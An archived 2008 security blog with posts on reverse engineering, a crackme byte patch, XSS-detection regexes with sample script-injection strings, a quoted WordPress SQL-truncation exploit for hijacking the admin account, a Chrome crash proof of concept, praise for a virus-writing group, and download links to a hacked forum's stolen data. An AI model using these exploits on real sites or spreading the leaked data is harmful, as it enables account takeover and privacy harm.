header

"There is nothing either good or bad, but thinking makes it so." - Shakespeare

Welcome
38.103.63.57
HTTP <-> HTTPS
Switch to HTTPS
News
Index
Archive of 2008
Texts
Attack
Defense
Advisories
Malicious
Others
Releases
Hacking/Cracking
Administration/Defense
Malicious codes
Exploits
Others
Others
About
Staff
Imprint
Multimedia
Hall of Shame
Best of error.log
Feed
RSS 2.0
Members blogs
SkyOut
Tatsumori
Komarov
Security news/vuln. alerts
Rootsecure
Securiteam
Secunia
Securitytracker
Securityfocus
Gnucitizen
Zone-H
Vuln./exploit databases
OSVDB
Milw0rm
Secwatch
Securityvulns
Packetstorm
Exploitsearch
Virus code databases
Netlux
VX Chaos
Trojanfrance
Blogs (AntiVirus/Security)
F-Secure
Symantec
Avertlabs
Viruslist
ESET
Ha.ckers
Offensive Computing
NewOrder
Rootkit
Electronical magazines
Phrack
(IN)SECURE
K_1ine
bUTCHERED fR0M iNSiDE
Die Datenschleuder
Commercial magazines
Hakin9
2600
Xakep
Affiliated pages
Perforin
SecuMania
Hosting provided by
Nexpa.de
29th - September - 2008 - 15:30

Checksums (MD5)

Just a few minutes ago I finished implementing checksums for all the files and texts offered on Wired-Security. On the right side of everything you can download you will find a text telling you "[checksum]", going with your mouse over it will show the MD5 hash value of it. It is realized using CSS, so need for JavaScript being enabled!

Important: If you find any checksum, that is not matching, please let me know and I will correct this!

29th - September - 2008 - 11:30

Somehow I knew this before...

pidgin

Reading Milw0rm yesterday I came over a guy of "SecNiche Security" called Aditya K Sood and I looked a bit at his site and found an advisory called "Pidgin IM Client Password Disclosure Vulnerability". It has the following description:

The pidgin client inherits client side password disclosure
vulnerability. The credentials used to connect to the
required service i.e. username and password is not encrypted
properly. The credentials can be extracted in clear text by
dumping process memory of the live pidgin process when a
connection is set. The vulnerability allows anyone with
access to the client system to obtain the username and
password. Additionally, this vulnerability could also be
exploited by fooling the user to execute malicious code
which would dump the memory of the process "pidgin.exe".

Ehm, yeah... I somehow think I have talked about something similar before... Do you remember [this post]? I said it is possible to dump the passwords and buddylists of the Pidgin Instant Messenger client without any problems. This is a common problem over instant messenger, that have to transfer passwords in cleartext to the chat networks. Even if some messenger save them in a crypted way it is mostly easy to get them anyway. So, well... I talked about this in June, now somebody wrote about this in September, the only difference: He dumps the process memory of pidgin.exe, that's all. More complex, looks more leet, nothing new! Anyway, that's it nowaday. People make a finding and call it their own without checking if it was disclosed before...

And again: Wired-Security readers knew first!

27th - September - 2008 - 00:30

Automatic EXE Patching

binary_exe

Being somehow frustrated about patching an executable file manually in a Hex Editor like the free HxD, byte for byte, I thought to code an application, that is able to parse the DIF files generated by the Interactive DisAssembler (IDA) and give it free of charge to you to use it yourself as well. If you just have to patch about 6 bytes it might be simple, but if it comes to bigger patching efforts you might want to have an application, that does it for you. So within two days I coded an application called "EXE PATCHER FOR IDA *.DIF FILES". I guess the name says it all. So here is a screenshot of the application:

exe_patcher_gui

Simple as it is: Put in the file to patch, the ouput filename and the name of the DIF file (all files must be in the same directory!). This graphical user interface is doing nothing else then calling a console application called "patch.exe", which takes four arguments: The file to patch, the one to generate, the offset and the byte to write there. For every line the DIF file holds the application will be cold once (so don't worry about those windows opening for a fraction of a second).

Finally you get a prompt telling you, that all is fine and your EXE has been patched. That's it! The applications (GUI + console) have been written using Microsoft Visual C# 2008 Express Edition and have been compiled and tested on the following systems and configurations:

- Windows XP (SP2) Professional with .Net 3.5 (SP1)
- Windows Vista (SP0) Premium with .Net 3.5 (SP0)

The following files have been put to "Releases" -> "Hacking/Cracking":

[EXE_PATCHER_BUILD_1_0_BETA.tar]
-> Includes the compiled executables plus a README.txt
[EXE_PATCHER_GUI.tar]
->The complete source code of the graphical part of the application
[EXE_PATCHER_CONSOLE.tar]
-> The complete source code of the console part of the application
[EXE_PATCHER_GUI.cs.txt]
-> The main part of the source code for the graphical part of the application
[EXE_PATCHER_CONSOLE.cs.txt]
-> The main part of the source code for the console part of the application

24th - September - 2008 - 18:00

(ReverseMe.)EXE patching

reverse_engineer

As I said some days ago, I am going deeper into Reverse (Code) Engineering and it is still a lot of fun and a good challenge to not get bored too fast. On the page [video.reverse-engineering.net] I checked out the first tutorial by TiGa, who is a trial member of the [ARTeam], a well known reverse engineering group for a few years now and with three published E-Zines. TiGa shows the same thing as Lena151 showed in her first video: How to manipulate the file ReverseMe.exe. The difference is, that TiGa shows it in IDA and Lena151 in OllyDbg. This was a good thing to compare both programs and I definitely like IDA more, especially because of its Graphical View, which can be manipulated to make it look the way you want it to and then understand the flow of the reversed program much better (and even months later). After watching the video by TiGa, which you can reach here:

http://video.reverse-engineering.net/main.php? \
g2_view=core.DownloadItem&g2_itemId=428&g2_navId=xc9db2144

(Use this g2_view option, otherwise the video is very small!)

I did everything as explained and then generated a DIF file, which looked like this:

This difference file is created by The Interactive Disassembler

reverseMe.exe
0000067B: 75 EB
000006B0: 75 EB
000006BF: 7C 90
000006C0: 36 90
000006D6: 7C 90
000006D7: 1F 90

Now I wanted to actually PATCH the executable file, so that I can click on it and the bypassing works. I searched for a Hex Editor and ended up with HxD for the moment, which did its job pretty well. I searched for the parts in the code looking for 0000067B, 000006B0 and so on... and then patched the specific byte on the left side with the one on the right side, which ended up looking like this:

reversme_exe_in_hxd_patched

Finally saved the file to ReverseMe_CRACKED.exe and started it and yeap: It did work...

you_really_did_it

Have fun doing it yourself! I am jumping over to read the book "REVERSING - Secrets of Reverse Engineering".

23rd - September - 2008 - 14:30

Hall of Shame

hacker_kid

After several months of having my website connected to the internet, I had to face a lot of attacks. Some of the highlights of my error.log file, are now online for you to view. Check out "Hall of Shame" -> "Best of error.log". My favourite is definitely this one:

File does not exist: /localhost/[path]/administrator/components/ \
com_joomla-visites/core/include/myMailer.class.php

Is it great to laugh or sad to see how stupid people became the last years in relation to computer security and hacking?! Think about it and laugh a lot!

[DIRECT LINK]

22nd - September - 2008 - 19:30

Ruby IDE (RDE) error

Just some short news from my side. While coding a bit in Ruby and trying to write a code, that parses the options you hand over to your Ruby script, I came accross an error (bug?), that I was able to reproduce endless times... The code is the following:

OptionParser.new do |foo|
    foo
  end

If you type a DOT after the second "foo" you might (no guarantee) get an access violation. At least I get it the following way:

rde_access_violation
(RDE 1.1.1.1 on Windows XP Professional SP2)

If someone knows an answer or can reproduce this as well, feel free to tell me... Let's go to coding again and try to not use this type of code anymore!

20th - September - 2008 - 19:00

The hack, that was not one

Everyone has heard the news I guess, telling you that "Sarah Palin's Email account in Yahoo has been hacked". Whow, sounds evil! Republicans hacked close to the elevations. Yeah, I waited some time before I decided to blog about it because it seemed a bit strange to me and I was right actually: Someone I won't name here, told the story, that he has hacked the account of Sarah Palin and made her data publicly available. But how has he done this? Bruteforcing? No, not even that! Here is the answer, that came to light now:

The "hacker" was able to find the address gov.palin@yahoo.com and then he just used the great features of Yahoo to reset your password. Yahoo prompts you with three security questions. If you answer them correctly you can reset the password. As Sarah Palin knows a lot about security she of course used very hard to guess answers ("What is my ZIP-Code?" and so on...). The intruder googled for the answers, found them and got into the account.

So: The hack, that wasn't one!

19th - September - 2008 - 15:00

Reversing on Mac OS X (Leopard)

The last days I got more and more deep into reversing (reverse engineering) on Mac OS X and my conclusion till now: It rocks! First I planned to install the IDA Pro 5.2 version onto my Mac and use it, but thats command line and seems quite limited somehow. So I checked some tutorials in the internet and figured out, that installing IDA Pro through CrossOver Mac is a quite good thing. It runs quickly and smoothly. Here's a screenshot for you:

ida_pro_mac
(click to enlarge image)

Furthermore there are many tools, that help you analyze binaries on Mac OS X if you don't want to reverse ON Mac, but reverse Mac (software). Let's take a look at some of them. Of course you might profit a lot of GDB:

[skyout:~]$ gdb
GNU gdb 6.3.50-20050815 (Apple version gdb-962) \
(Sat Jul 26 08:14:40 UTC 2008)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-apple-darwin".
(gdb)
[...]

Another very cool tool is heap, which helps you to analyze the ressources a progam takes. Let's check what iTunes uses:

[skyout:~]$ heap 488
Process 488: 2 zones
Zone DefaultMallocZone_0xf69000: Overall size: 30427KB; \
68512 nodes malloced for 25042KB (82% of capacity); \
largest unused: [0x1b2a800-4949KB]
Zone unnamed_zone_0xf6c000: Overall size: 1023KB; \
1 nodes malloced for 1KB (0% of capacity); \
largest unused: [0x1100020-1023KB]
All zones: 68513 nodes malloced - 25042KB
[...]

And checking the FS calls made by iTunes:

[skyout:~]$ sudo fs_usage | grep iTunes
[...]
14:39:37  open              /dev/random
14:39:37  read
14:39:37  close
14:39:39  RdData[async]
14:39:39  pread     
14:39:39  getattrlist       /Users/skyout/Library
14:39:39  getattrlist      
14:39:39  getattrlist       /Users/skyout/Library      
14:39:39  getattrlist       /Users/skyout/Library/iTunes
14:39:39  getattrlist       /Users/skyout/Library/iTunes
14:39:39  getattrlist       /Users/skyout/Library/iTunes
14:39:39  getattrlist       /Users/skyout/Library/iTunes/Scripts
14:39:39  getattrlist       /Users/skyout/Library/iTunes
14:39:39  getattrlist       /Library
[...]

And so on and on... Here a listing of some other tools, that might help analyzing things:

nm
file
lsof
vmmap
otool
lipo
[...]

The post was not that technical, but I am just at the beginning, so as soon as I learn more, you will read more about it. Promised!

17th - September - 2008 - 17:00

Firefox Greasemonkey Worm

firefox

WarGame sent me a quick note one day ago about a description made by Symantec for his Greasemonkey worm, that has been released in the combined E-Zine of EOF a short time ago.

- [JS.Posmonk by Symantec]
- [WarGame's Blog]

Nice one! Go on that way.

17th - September - 2008 - 15:30

Risky iPhone 2.1 feature

iphone

Yesterday I installed the new iPhone firmware 2.1 (and of course made the jailbreak through Pwnage 2.1). After the restore with the customly cracked firmware it was able to access to iPhone without typing in any password. So far nothing to worry, set it again and you're done. But I found a nice "feature" telling you the following:

All data on this iPhone will be deleted after 10 wrong login attempts.

Okay, this "feature" is disabled by default, but if you set it, attackers having physical access to your iPhone have a nice ability to make you go numb. Just imagine you let your iPhone lay around, someone visits you and plays around with it and tries 10 times to guess your password. The tenth attempt to break your password your data is gone... Ouch, that will suck!

16th - September - 2008 - 18:00

Fixing a strange bug in Leopard

applesymbol

Just a quick note from my side before I leave the computer for today. I encountered a very strange bug on Mac OS X 10.5 (Leopard), when updating to it from 10.4 (Tiger). The following things went strange:

- The automatic update mechanism did not work anymore
- The Preview application did not work anymore
- Many other applications stopped to work properly...

Not using my MacBook for quite a while, it wasn't a problem for me. But I now use my MacBook more often and so I sat down one night, searching for explanations and solutions... I ended up finding out the following: After the update to Leopard the directory for temporary files was set to ROOT, which resulted in the problems I just told because the applications trying to save data in the temporary directory were not allowed to do so and stopped working fine. The solution is simple:

sudo chgrp -R 'whoami' $TMPDIR

Typing this into the Terminal of Mac OS X solved all my problems... But now my harddisk is full of trash, that the applications have written into different locations instead of $TMPDIR... Yeeha, that means a lot of cleaning the next time.

12th - September - 2008 - 17:00

New Hakin9 article by Komarov

wifi

Long time without a new article to read. So now you will get some new stuff to check out. It is a quite old article by Andrej Komarov, written for the english version of the polish Hakin9 magazine. The title says it all "Analysing and Mapping Wireless Networks". You will learn the following things by reading the article:

- WiFi Positioning
- How to make a Wardriver's map
- Common attacks in the wireless infrastructure

The following things you should know before reading it:

- Some knowledge on wireless technology
- Basic knowledge on network analyzing

Have fun! You can find the article in "Texts" -> "Attack" or click [here].

12th - September - 2008 - 14:00

Regex until collapse (2)

regex

Even I know, that it won't work perfectly and never will due to the oppinion of some specialists, I have updated my regular expression another time. Thanks go to Stefan Esser and Veda for helping me a bit and make me realize, that it is NOT possible to match 100% of every valid XSS string and DON'T match 100% of every invalid XSS string. Nevertheless I updated my regex a bit. Thanks go also to RadiatioN, who triggered the exception, which forced me to update it:

preg_match('/^[a-zA-Z0-9\S\s]{0,}(((<script>|
<script [a-zA-Z0-9]{0,}>)alert\(([0-9]+|\"[a-zA-Z0-9\S\s]+\"|
\'[a-zA-Z0-9\S\s]+\'|\"\"|document[a-zA-Z\.]{0,})\)[a-zA-Z0-9\S\s]{0,}
<\/script>)|((<iframe>|<iframe [a-zA-Z0-9\S\s]{0,}>)))
[a-zA-Z0-9\S\s]{0,}$/i', $string)

Besides, Veda pointed my attention to the number one PHP Intrusion Detection System, that can be found under [php-ids.org]. So I checked it, did one try with "><iframe111> (which is invalid!) and the [demo] blocked this string as malicious, what it isn't. So even this great project does not solve my problem... Ouch!

11th - September - 2008 - 17:30

Regex until collapse

regex

For the last 15 hours I have done nothing else then writing regular expressions, again and again. Trying to make a regex, that detects EVERY possible valid XSS string and does NOT match on ANY invalid XSS string. My conclusion: It is not possible or you need a lot more time and need to use different encoding mechanisms... My solution (until now), that detects a lot of typical XSS strings, but which can still be tricked, is the following code:

preg_match('/^[a-zA-Z0-9\S\s]{0,}((<script>alert\(
([0-9]+|\"[a-zA-Z0-9\S\s]+\"|\"\"|document[a-zA-Z\.]{0,})\)
[a-zA-Z0-9\S\s]{0,}<\/script>)|(<iframe [a-zA-Z0-9\S\s]{0,}>
[a-zA-Z0-9]{0,}))[a-zA-Z0-9\S\s]{0,}$/i', $string)

I bet in one week I won't understand it anymore... Anyway, it matches a lot of XSS strings perfectly, some examples:

<script>alert("XSS");</script>
<script>alert(1337);</script>
foobar<iframe>foobar</iframe>foobar
foo<script>alert(document.foobar);bar</script><!--
asdasd<iframe sd3424="asdasdasd">472389djkasfan</iframe>asdas<!--
<iframe src="http://google.de" style="height:300px"></iframe>
<script>alert("ööö");</script>

Furthermore it DOESN'T match a lot of invalid strings (which is the sense of the regex of course):

<script>1337alert("XSS");</script>
<script>alert(aaaaa);</script>
<script>alert();</script>

But the filter is not yet perfect (and might never be because perfection is hard to reach in some hours only), so you can fool the filter with such a string:

<script>alert(" " ");</script>
<iframe>

If/When I'll update the regex filter, I will write news about it here. Check out.

11th - September - 2008 - 11:30

Nmap 4.75 released

insecure

Just crashing over the news, that a new version of Nmap is available with new cool features, I decided to inform you about this as well if you haven't read it somewhere else, yet. The version number is now 4.75 and the most interesting new feature is the ability of Nmap tp draw a schema of the scanned network. This feature is only available through the GUI Zenmap, which I tested on Windows, but not yet on Mac OS X (I will do todays evening). That's a photo of such a drawn map:

zenmap_map
(Zenmap + Nmap 4.75)

Furthermore the detection through fingerprints has been updated, some of the highlights of the new database for fingerprints:
- iPhone
- Wii
- Linux 2.6.25
- Windows Vista (SP1)
- Mac OS X Darwin 9.2.2
...

What more to say? I love Nmap and you will learn to love it, too. So check out the [changelog] to get further information and finally go to the [download section] to get Nmap 4.75!

10th - September - 2008 - 14:00

DoomRiderz gone, EOF growing

eof

The first one talking about it was the well-known and hated loved Peter Ferrie: DoomRiderz is dead! Now it has been made official on the website of the EOF-Project and when you visit [doomriderz.co.nr], then you will see a video taken from YouTube and a message "R.I.P.". That's all. You can visit the old website by going to [old_index.html]. I guess it was a matter of time until this had to happen, the only really active and stable member was the leader WarGame, who worked together with Necronomikon for quite a while, but he quit back in the beginning of 2008. After some time after the release of the second magazine of EOF WarGame went back to this group as a member. Ironically the second E-Zine of EOF has been a co-work of RRLF, DR and EOF, none of the groups exist anymore, instead of the EOF-Project, which is growing at the moment.

The forum of EOF, that can be reached under [vx.eof-project.net] has been growing massively in the last months and consists of dozens of members now, whereas some are very active and many are very silent. Nevertheless it has become the #1 place to discuss new ideas and present new viruses. At the moment the EOF team itself consists of the following members (taken from authors.html):

izee
E-mail: izee[at]eof-project[dot]net
Blog: izee-eof.livejournal.com

Nibble
E-mail: xNibble[at]hotmail[dot]com

AzRaEL
E-mail: crackstaff[at]crackenfind[dot]net
Homepage: crackenfind.net and crackergt.net

Berniee/Fakedminded
E-mail: fakedminded[at]cooltoad[dot]com
Homepage: vx.org.ua/bernieevx
Blog: fakedminded.wordpress.com

WarGame
E-mail: wargame89[at]yahoo[dot]it
Blog: vx.org.ua/wargamevx

Dark Prophet
E-Mail: prophet[at]eof-project[dot]net

tanMa
E-Mail: demonyu[at]yahoo[dot]com

Good luck to everyone in the team! I hope they will be active and present some great stuff in near and far future. Hint: I am working on a new creation as well, but as I am concentrating on other things first, the researching and development will start somewhere at the first months of 2009. Be prepared.

09th - September - 2008 - 22:30

WP 2.6.1 SQL Column Trunc. Vuln.

Not long ago I talked about a new way to bypass SQL queries and hijack a web application. The way to do this has been found by the well known PHP Security specialist Stefan Esser, who has been part of the PHP Security Team for quite a while. He talked about SQL Truncation and now the proof arrived: He was right! A guy using the handle irk4z published an exploit on Milw0rm, that uses the described vulnerability by Stefan Esser to reset the administrator password of a WordPress installation. Mostly every big web application can be considered being at risk if not filtered correctly. Check out the exploit yourself. Reading it says more then a thousand words:

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                       x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/

# milw0rm.com [2008-09-07]

The original exploit can be found at [milw0rm.com/exploits/6397].

The article talking about this case of (new) vulnerabilities can be found at [suspekt.org].

04th - September - 2008 - 14:30

Busses in Ulm using Windows (2)

After my first post on this topic, someone send me an Email with some more funny images concerning Windows systems in Ulm. Have fun!

error_report_windows_bus_ulm
Want to send an error report to Microsoft?

ulm_bus_bsod
The good old BSOD.

windows_crash_in_university
And even the university in Ulm is using Windows...

Thanks go to David of [datenschrott.de] for this pictures!

03rd - September - 2008 - 14:00

Google Chrome exploits out

google_chrome

Whow, that was damn fast! Only a few hours after the release of Google Chrome, the browser developed by Google, the first exploits were out, demonstrating how to hijack the users system with a little user interaction. Two bugs have been reported until now: The first one allows to infect the system, the second one makes the browser crash. So, that is interesting, let's look a bit deeper.

First of, the Denial-of-Service bug. The interesting thing about this bug is, that it makes the whole browser instance crash, something that shouldn't happen at all as far as the developers of Google have promised. In their comic about the browser they showed, that every browsers tab in running in a sandbox. One tab crashing shouldn't affect other tabs, but the bug discovered by Rishi Narang (psy.echo) does exactly this: Shutting down the whole browser and it' really simple. That's the code to do so:

PoC: http://evilfingers.com/advisory/google_chrome_poc.php
---

<a href="EVIL:%">CRASH ME</a>

The second bug is even more fun. It is actually not a problem of Google Chrome itself, it's a problem of the technology, that Chrome uses. The browser uses the WebKit, that is also included in Apple's Safari and in an older version this software had a bug, that allowed a Carpet Bomb attack, meaning, that the attacker was able to download files to the users system without any user interaction. Now there are some things to think of. First off, in the original exploit it was a combination of Safari and Internet Explorer on Windows, that made the attack possible because the downloading itself isn't that risky, the problem got critical when the user surfed with Safari, a DLL got downloaded to the desktop and then the user used Internet Explorer again, which searched the desktop for files to include, such as the DLL. And then the exploit was successfull. In Google Chrome it's slightly different. Same thing: The user surfs to a website, a file gets downloaded by the browser and then(!) the user clicks on a specific button in Chrome being placed on the downside of the browser window as far as I read. With a little bit of Social Engineering it shouldn't be hard to make someone surf a website and click the specific button, so I would consider this a critical threat. Even worse: It wouldn't have been there if Google would have used up-to-date software... Ouch!

PoC: http://raffon.net/research/google/chrome/carpet.html
02nd - September - 2008 - 15:30

Blood and Honour owned

blood_and_honour_hacked

It finally happened: One of the biggest fascist networks worldwide has been hacked by left orientated activists. The network known as Blood&Honour is one of the last really big remaining possibilities for fascists to talk freely about their ideology, share information and plan stuff. I guess it was only a matter of time until the hackers would find a way into the servers and last week it happened. Officially this is only a music network, but yeah... guess what the music is for: Transport their ideology and get new people for the movement! The nice thing about the hack: They archived the WHOLE forum and loaded it up to servers of Rapidshare and Megaupload. So you can download the files, extract them and set up a Webserver on your own machine, browsing through the forum without restrictions. If you want to check it out, here are the links:

http://www.megaupload.com/?d=08K7HVI0
http://www.megaupload.com/?d=XMYS4W63
http://www.megaupload.com/?d=SKDPG4B0
http://www.megaupload.com/?d=EJ0DB1X5

The Rapidshare links are down. Seems the administrators of the site have done something against this. It is too late anyway. Enough people have downloaded it, yet.

The forum of Blood&Honour shall be back soon, but the comments they made on the stolen data is just too lame to not be mentioned:

In regards to any data that has been stolen off this website.
Once any data, from whatever source, is downloaded onto a
personal computer such as a hackers, that data can be changed
and forged to anything that hacker wants. IP addresses can be
changed; Private Messages can be altered or even created. The
data is simply a text file that anyone can open and change on
their computer.

To be precise, the forum was saved in a database and as far as I know, this is not a simple textfile, furthermore it is a special binary format used by MySQL. But hey, be fair, let the fascists believe all is fine and there is no risk for them. Ah and besides: If they think the data can't be used against them, it is possible to check whether something has been changed or not, so the argumentation sucks, but well... When the administrators argue this way, no wonder they got hacked.

02nd - September - 2008 - 13:30

From RE:SOLUTION to E:VOLUTION

f-secure

On the 9th of July in 2007 the skandinavian AntiVirus company F-Secure published a video called "F-Secure RE:SOLUTION" on their Youtube's channel [fslabs]. Now, on the 28th of August in 2008 they brought out a new version, called "F-Secure E:VOLUTION". I somehow enjoyed watching that new video and listening to Mikko stating, that everyone is getting worth... Now have fun yourself:


(F-Secure RE:SOLUTION)


(F-Secure E:VOLUTION)

01st - September - 2008 - 17:00

Busses in Ulm using Windows

Before I go home for today, something funny for you. I took some images of the system used in busses in Ulm (the city I live in).

First off, the normal way it looks when you press STOP to make the bus driver let you out:

ulm_bus_display_normal

Now the way it looks, when something goes wrong:

ulm_bus_display_page_not_found_small

Can't you see, what I mean? Look at the zoomed-in version below:

ulm_bus_display_page_not_found_zoom

And finally when everything goes down, we have this:

ulm_bus_display_windows

Hope you liked it...

01st - September - 2008 - 13:00

Apple's NDA: STFU!

applesymbol

Some people might still know it, for all the others: I am currently going deeper into OS X development, especially for the iPhone. The market is very interesting and growing rapidly, every manager wants an iPhone and more and more companies use the iPhone for all their employees. Now I downloaded the SDK from Apple and the first videos to start with, everything fine so far and well done, BUT I had to sign a NDA (Non-Disclosure Agreement) as every other developer and that NDA is really strange. I really ask myself why Apple tries to control it that hard, it's a gunshot in their own knees. Anyway, read it yourself. That's, what I got when I registered to the development mailinglist on list.apple.com:

Until an announcement is made otherwise, developers should be aware
that the iPhone SDK is still under non-disclosure (section 5.3 of the
iPhone Development Agreement). It can't be discussed here, or anywhere
publicly. This includes other mailing lists, forums, and also blogs.
Violating the NDA will result in WWDR being notified of the breach.
Further action is at their (and legal's) discretion.

The iPhone SDK situation is somewhat different than a Mac OS X
release, in that a Mac OS X release includes a copy of the developer
tools with the distribution. The iPhone OS 2.0 release on devices and
as an upgrade does _not_ include the development tools. As a result,
the SDK is not automatically considered public because the release has
occurred.

Section 5.3 of the iPhone Development Agreement remains in force at
this time, and will so remain until iPhone Developer Program members
are specifically and personally notified by an authorized
representative of Apple.
Copyright © 2008 by SkyOut (Marcell Dietl)